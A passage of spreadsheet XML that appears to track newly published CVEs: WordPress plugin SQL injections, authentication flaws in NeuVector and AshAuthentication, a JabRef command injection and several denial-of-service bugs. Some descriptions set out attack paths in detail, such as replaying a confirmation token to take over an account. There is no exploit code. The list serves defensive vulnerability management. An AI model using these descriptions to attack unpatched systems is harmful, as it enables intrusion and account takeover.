          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WPMasterToolKit &lt;= 2.22.0 versions.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66624</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66625</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WC Vendors Marketplace &lt;= 2.7.2.1 versions.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66625</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66626</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in SKT Addons for Elementor &lt;= 4.0 versions.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66626</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66628</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Shop manager SQL Injection in WP-Lister Lite for eBay &lt;= 3.8.11 versions.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66628</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66630</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66630</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66631</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in MC Woocommerce Wishlist &lt;= 1.9.21 versions.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66631</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78425</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Authorised users of outside applications behind the same corporate identity provider (IdP), for example, a wiki, a ticketing system, an expenses tool, or anything they legitimately hold an account on can log into their system via SAML SSO. The IdP issues an assertion to them. If that assertion is presented to NeuVector, NeuVector accepts it because the only thing distinguishing "an assertion for NeuVector" from "an assertion for the wiki" is the element, and the `NotInAudience` warning that reports the mismatch is never read.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78425</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80218</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in team-alembic AshAuthentication allows an attacker holding a sign-in token for one authenticated resource to be signed in as a user of a different resource.
AshAuthentication.Strategy.Password.SignInWithTokenPreparation.extract_primary_keys_from_subject/2 parses the JWT sub claim (for example user?id=1) with URI.parse/1 and keeps only its query string, discarding the path segment that names the subject the token was issued for. Nothing else restores that binding: AshAuthentication.Jwt.verify/3 checks the signature, exp, nbf, jti and the library-version claims, the purpose check only requires sign_in, and the remaining comparison is over primary-key field names, which are identical across resources. The WebAuthn sign-in and remember-me preparations carry copies of the same helper and drop the path in the same way. The magic link sign-in path pins the subject name against the resource and is not affected.
This issue affects ash_authentication: from 3.10.5 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80218</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82685</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key vulnerability in team-alembic AshAuthentication allows an authenticated attacker to overwrite and confirm another user's email address, and so take over that account. A confirmation token issued to one user is accepted on any other user's record.
AshAuthentication.AddOn.Confirmation.ConfirmChange verifies the token's signature and its act claim, then applies the changes stored against that token to whichever record the changeset targets, never comparing the sub claim against changeset.data. An attacker who registers an account and changes their own email replays the resulting token against a victim's record id, writing in their own address with force_change_attributes/2 and stamping confirmed_at, after which an ordinary password reset yields the account. The library's own confirmation flow is unaffected, because AshAuthentication.AddOn.Confirmation.Actions.confirm/3 resolves sub to a user and targets that record.
This issue affects ash_authentication: from 0.5.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82685</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25275</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing authentication frames with invalid FILS information element header lengths.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25275</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50125</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>MKP is a Model Context Protocol server for Kubernetes. Prior to 0.4.1, cmd/server/main.go exposes the default HTTP endpoint and pkg/mcp/server.go registers the unauthenticated get_resource tool, which accepts attacker-controlled limitBytes and tailLines values for the pods logs subresource. buildPodLogOpts() in pkg/k8s/subresource.go parses those values as unbounded int64 parameters, and defaultGetPodLogs() copies the returned Kubernetes log stream through io.Copy into an in-memory bytes.Buffer without an application-side cap. A remote attacker who can reach the default port 8080 MCP endpoint and select a pod with sufficiently large accumulated logs can send one tools/call request that causes large allocations and additional response copies, while the request-frequency limiter does not constrain per-request volume. This can exhaust process memory, terminate the MKP server, and deny the MCP service; observed testing showed more than one GiB of RSS growth while handling a 128 MiB requested stream. This issue is fixed in version 0.4.1.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50125</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50275</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>The Datadog PHP Tracer provides application performance monitoring and distributed tracing for PHP. Prior to 1.19.2, ddtrace_deserialize_baggage in ext/distributed_tracing_headers.c parses incoming W3C baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES. A remote unauthenticated client can send an arbitrarily large number of comma-separated key-value pairs or a single oversized value, causing the tracer to allocate hash-map entries and consume unbounded CPU and memory on each request. Baggage extraction is enabled by default in most affected deployments unless baggage is removed from DD_TRACE_PROPAGATION_STYLE or DD_TRACE_PROPAGATION_STYLE_EXTRACT. This issue is fixed in version 1.19.2.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50275</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50277</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>dd-trace-cpp is the Datadog distributed tracing library for C++. Prior to 2.1.0, dd-trace-cpp parses incoming W3C baggage headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES on the extraction path, even though those limits are enforced during injection. A remote unauthenticated attacker can send a header containing many comma-separated key-value pairs or one very large value, causing per-request hash-map allocation and unbounded CPU and memory consumption. Baggage extraction is enabled by default in most affected tracers unless baggage is removed from DD_TRACE_PROPAGATION_STYLE or DD_TRACE_PROPAGATION_STYLE_EXTRACT, so affected internet-facing services can be denied service. This issue is fixed in version 2.1.0.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50277</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50285</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-770</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Pomerium is an identity and context-aware access proxy. Prior to 0.32.8, decodeQueryStringV2 in pkg/hpke/url.go performs zstd decompression of attacker-controlled data without an output-memory limit when DecryptURLValues processes HPKE V2 values for Stateless.Callback in internal/authenticateflow/stateless.go. In hosted or stateless authentication deployments, an unauthenticated attacker can obtain the receiver key from /.well-known/pomerium/hpke-public-key, provide a matching attacker-controlled sender key, and send a compressed payload to /.pomerium/callback that expands before validateSenderPublicKey rejects the sender. This can allocate hundreds of megabytes per request, exhaust proxy memory, crash or degrade the process, and block access to applications protected by the deployment. Stateful deployments are not affected because the stateful callback verifies its HMAC signature before decryption and decompression. This issue is fixed in version 0.32.8.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50285</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53534</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>JabRef is a desktop application for managing BibTeX and BibLaTeX libraries. Prior to 6.0-alpha.6, when jabsrv or JabRef's built-in HTTP server is enabled, the GET /better-bibtex/cayw endpoint accepts an external command query parameter and CAYWQueryParams.getCommand() passes it through CAYWResource.getCitation() into PushToSublimeText.getCommandLine(). On Unix-like systems, PushToSublimeText combines this untrusted cite-command prefix and citation keys into a string executed through sh -c by ProcessBuilder without shell escaping. A client that can cause a localhost request with application=sublime can inject shell metacharacters and execute operating-system commands as the JabRef user when a valid Sublime Text command path is configured and the victim completes the CAYW selection dialog. The built-in server is disabled by default, so exploitation requires the victim to enable it or run jabsrv. This issue is fixed in version 6.0-alpha.6.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53534</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54716</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
